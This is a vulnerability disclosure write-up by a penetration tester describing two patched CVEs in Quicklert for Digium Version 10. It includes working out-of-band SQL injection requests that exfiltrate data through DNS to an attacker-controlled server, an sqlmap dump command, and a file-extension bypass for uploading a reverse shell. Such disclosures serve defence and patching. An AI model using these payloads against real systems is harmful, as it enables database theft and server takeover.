Machevalia

View Original

SQLi and RCE in Quicklert for Digium

Overview

At the end of 2021, I conducted a penetration test where I discovered two critical severity vulnerabilities in Quicklert for Digium Version 10 Build 1043. The first vulnerability was a blind SQL injection (SQLi) vulnerability which revealed the entirety of the database, including user authenticators (including Administrator) in plain text. This finding allowed me access to the rest of the web application gated behind authentication. After authenticating to the web application, I was able to discover an undocumented media library in the application that allowed for an arbitrary file upload resulting in remote code execution (RCE) and ultimately complete takeover of the server.

I along with my employer, Assura Inc., registered the vulnerabilities with MITRE and worked with the vendor to correct the issues in the latest version. The vulnerabilities have since been patched in Quicklert for Digium Version 10 Build 1051. I have detailed each of the findings below.

CVE-2021-43969

Summary

Name Quicklert for Digium Version 10 Build 1043 – Blind SQL Injection with Out-of-Band Interaction (DNS)
Product Quicklert for Digium
Affected Versions Version 10 Build <1051
State Public
Release Date 2022-03-01

Vulnerability

Type SQL Injection
Rule CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) https://cwe.mitre.org/data/definitions/89.html
Remote Yes
Authentication Required No
CVSSv3 Vector AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C/CR:X/IR:X/AR:X/MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:H/MI:H/MA:H
CVSSv3 Base Score 10 (Critical Severity)
Exploit Available No, but manually exploitable
CVE ID(s) CVE-2021-43969

Description

The ‘uname’ parameter of the login.jsp page for “Quicklert for Digium Version 10 Build 1043” is affected by both a blind SQL injection with out-of-band interaction and a time-based SQL injection. The exploitation of this vulnerability requires no prior authentication and results in the complete compromise of confidentiality, integrity, and availability of the underlying SQL database.

Proof-of-Concept

First, you must escape the value entered in the ‘uname’ parameter on the login.jsp page to inject code which will call back to a DNS server under our control (Burp Collaborator in this case) utilizing the MSSQL function “master.xp_dirtree”, which lists directory contents by default. The DNS server will not be found in a local directory and will result in the server making a request to our DNS server in an attempt to find that address for the master.xp_dirtree function. Note: If you attempt to recreate this exploit, you will need to URL encode the SQL statements as seen in the screenshots below.

GET /quicklert/login.jsp?function=login&smid=&uname=user', '1');declare @q varchar(99);set @q='\\<yourDNSserverhere\x'; exec master.dbo.xp_dirtree @q;-- &passwd=password&b.x=0&b.y=0 HTTP/1.1

Figure 1: Generic Out of Band SQL Injection with DNS Interaction to Burp Collaborator

After validating that you are receiving DNS requests from the vulnerable server, it is possible to continue using the “master.xp_dirtree” function to exfiltrate data from the server including the database name, admin username, etc., by altering the above command slightly. See the example below where we retrieved the DB_NAME value by adding that additional argument:

GET /quicklert/login.jsp?function=login&smid=&uname=user', '1');declare @q varchar(99);set @q='\\'+(DB_name())+'.<yourDNSserverhere>\xci'; exec master.dbo.xp_dirtree @q;-- &passwd=password&b.x=0&b.y=0 HTTP/1.1

Figure 2: Obtain DB_NAME value via Out of Band SQL Injection with DNS Interaction to Burp Collaborator

Note that via this technique we can see that the DB_NAME value for Quicklert (‘NIPA’ by default) is prepended to the DNS query that we received in the Burp Collaborator tool:

Figure 3: DB_NAME value "NIPA" Prepended to DNS Request in Burp Collaborator

At this point, I could have continued this process of retrieving data piece by piece from the database through Burp Suite but there is a limitation to the string size which can be retrieved through these types of DNS queries. This led me to utilize time-based SQL injections which is easily automated using SQLmap.py by saving the Burp Suite request to a file and then using the following command:

Sqlmap.py -r yourSQLirequesthere.txt -p uname –risk 3 –level 3 -D NIPA

I used variations on that command to “dump” the database contents of the database. Within SQLmap.py I used --tables and --columns to find the fields I wanted to obtain. After doing this, I was able to obtain user IDs and passwords for every user in the database in plaintext resulting in access to the web application as a valid user.

Exploit

There is no pre-packaged exploit for this vulnerability at this time although it can be easily exploited manually as shown in the Proof-of-Concept section above.

Mitigation

Quicklert corrected the sanitization issue in the ‘uname’ parameter in Quicklert v10 Build 1051.

Vendor Page https://quicklert.com/
CVE Description https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43969
Official Write-Up https://www.assurainc.com/assura-announces-discovery-of-two-vulnerabilities-in-quicklert-for-digium-switchvox/amp-on/

Timeline

  • 2021-11-12: Vulnerability discovered
  • 2021-11-12: Vendor contacted
  • 2021-11-17: CVE #s issued by MITRE
  • 2022-02-22: Vendor confirmed patch
  • 2022-03-01: Public disclosure by Assura
  • 2022-03-13: Personal write-up

CVE-2021-43970

Summary

Name Quicklert for Digium Version 10 Build 1043 – Arbitrary File Upload Results in Remote Code Execution
Product Quicklert for Digium
Affected Versions Version 10 Build <1051
State Public
Release Date 2022-03-01

Vulnerability

Type Arbitrary File Upload
Rule CWE-434: Unrestricted Upload of File with Dangerous Type https://cwe.mitre.org/data/definitions/434.html
Remote Yes
Authentication Required Yes
CVSSv3 Vector AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C/CR:L/IR:H/AR:H/MAV:N/MAC:L/MPR:L/MUI:N/MS:C/MC:H/MI:H/MA:H
CVSSv3 Base Score 9.9 (Critical Severity)
Exploit Available No, but manually exploitable
CVE ID(s) CVE-2021-43970

Description

The ‘audioFile’ parameter of the /quicklert/albumimages.jsp web form in Quicklert for Digium Version 10 Build 1043 is vulnerable to arbitrary file upload. This vulnerability allows authenticated (low privilege) attackers to upload malicious files to the server which are then executed when called by the media viewer within the web application. The exploitation of this vulnerability resulted in a complete compromise to the confidentiality, integrity, and availability of the server and served as a jump point into the victim’s network.

Proof-of-Concept

After gaining credentials via the SQLi above, I was authenticated to the web application and subsequently discovered the /quicklert/album.jsp page which allowed us to add a new media album to my account. After creating the new album, I was then able to upload new media files via the /quicklert/albumimages.jsp web form.

Figure 4: Quicklert Album "Test" Created

Figure 5: Quicklert Album File Upload

I then created a Java reverse shell utilizing msfvenom which was saved as “reverse.mp3”. The payload was uploaded file via /quicklert/albumimages.jps while the interceptor functionality of Burp Suite proxy was running. This allowed me to capture the POST request and make the following modifications:

  • I renamed the filename from “reverse.mp3” to “reverse.mp3;.jsp”. This ensures that the server recognizes the Java reverse shell as a valid JSP file while bypassing the limited file extension validations the web application had in place.

  • Additionally, I added a small piece of the byte-stream from a valid mp3 file by “catting” the file and then pasting the results above the current payload in Burp Suite. This also helps to bypass file-type filtering when the application is checking the file to validate that it appears to match the mime-type and/or extension declared in the POST request.

After making these modifications, I released the intercepted request to allow it to POST the payload to the server.

Figure 6: File Upload POST Request Captured in Burp Suite Before Modifications

Figure 7: File Upload POST Request Captured in Burp Suite After Modifications

After the file was posted on the server, I started a Meterpreter listener and then accessed the “reverse.mp3;.jsp” payload on the server. The server interpreted the Java Server Page (jsp) file correctly and created a reverse connection back to my listener which ultimately resulted in a total takeover of the server within the victim’s DMZ because the application was running as SYSTEM (Windows).

Figure 8: "Test" album after "reverse.mp3;.jsp" is uploaded.

Figure 9: Resulting web page after clicking "reverse.mp3;.jsp" and the server attempts to open the Java Payload as an mp3 file.

Figure 10: Meterpreter reverse shell opened in Metasploit resulting in system takeover after clicking "reverse.mp3;.jsp"

Exploit

There is no pre-packaged exploit for this vulnerability at this time although it can be easily exploited manually as shown in the Proof-of-Concept section above.

Mitigation

Quicklert added additional file-type validation to the i.Album feature within the application to prevent uploading of potentially malicious file types.

References

Vendor Page https://quicklert.com/
CVE Description https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43970
Official Write-Up https://www.assurainc.com/assura-announces-discovery-of-two-vulnerabilities-in-quicklert-for-digium-switchvox/amp-on/

Timeline

  • 2021-11-12: Vulnerability discovered
  • 2021-11-12: Vendor contacted
  • 2021-11-17: CVE #s issued by MITRE
  • 2022-02-22: Vendor confirmed patch
  • 2022-03-01: Public disclosure
  • 2022-03-13: Personal write-up